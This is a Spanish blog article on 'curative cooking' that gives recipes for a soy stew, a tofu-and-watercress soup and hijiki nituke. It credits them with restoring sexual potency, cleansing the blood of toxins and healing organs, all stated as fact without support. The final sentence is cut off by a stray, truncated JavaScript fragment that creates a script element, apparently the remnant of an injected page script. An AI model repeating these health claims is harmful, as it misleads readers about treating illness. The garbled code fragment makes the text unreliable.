Salud y belleza » Alimentación

La cocina como método curativo

Sin Comentarios

Se define a la Gastronomía como la ciencia que estudia la relación entre el hombre y sus métodos alimenticios. Aquella relación, como cualquier otra, incluso las de pareja, puede ser buena o mala, y hasta tener altibajos. Bien, cuando hablamos de “cocina curativa”, naturalmente hablamos de una “relación sana” (la cocina rica en calorías podría definirse como “una relación de puro placer” y, si se trata de cocina saludable pero insípida, la analogía nos llevaría a afirmar que la relación es “conflictiva”).

En esta ocasión presentamos un detalle con algunas fórmulas y recetas curativas, de esas que ayudan a solucionar determinados males físicos. Porque, desde ya, la comida también es un sitio ideal para recuperar la salud: ahora lo veremos.

Guiso de soja con añadido de raíces

Aporte del método curativo: fortalece y vigoriza; otorga proteínas, minerales; favorece la lactancia; recobra la potencia sexual; ayuda a mejorar la circulación.

Receta: primero se deben cocinar la soja -sus brotes: dejarlos en remojo durante la víspera-, luego agregar un trozo de alga kombu y calabaza para formar así una masa cremosa. Tras la cocción, añadir cebolla, bardana, zanahorias y sal.

Sopa mineralizante

Aporte del método curativo: sumamente efectiva para limpiar la sangre de toxinas y fortalecer el sistema inmunológico; además el plato presenta una increíble fuente de hierro y vitaminas varias.

Receta: ante todo, echar los cubitos de tofu elegidos en sartén o simplemente hervir en el caldo durante unos minutos, agregar berro cortado y condimentamos con miso y alga wakame tostada y molida. Servir.

Nituke de Hijiki

Aporte del método curativo: el alga de Hijiki está considerada como una de las mayores fuentes de calcio; a su vez también representa un importante aporte en hierros y minerales; su consumo está recomendado para el bien de los pulmones, intestino, riñones, y aparato genitourinario.

Receta: para preparar el Nitkue, seleccionar dos cebollas, cortarlas muy fino, rehogar a fuerte lento (en aceite de oliva). Luego, cuando ya se hayan puesto en remojo las algas de hijiki, añadir esa cebolla, junto con zanahorias cortadas. Volver a rehogar hasta que los vegetales estén tiernos y aderezar el conjunto con shoyu, finalizando luego la cocción.

Como vemos, la cocina funciona a la perfección como laboratorio: desde allí, si bien es imposible inventar vacunas, fármacos u otros químicos, es viable la preparación de ciertos platos ideales para aumentar las defensas o, incluso, solucionar ciertos malestares relacionados a la salud.

La Gastronomía, como vemos, no solo abarca la visita hacia el restaurante nuevo del barrio: también representa otros objetivos menos turísticos, más sanos.} else {var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.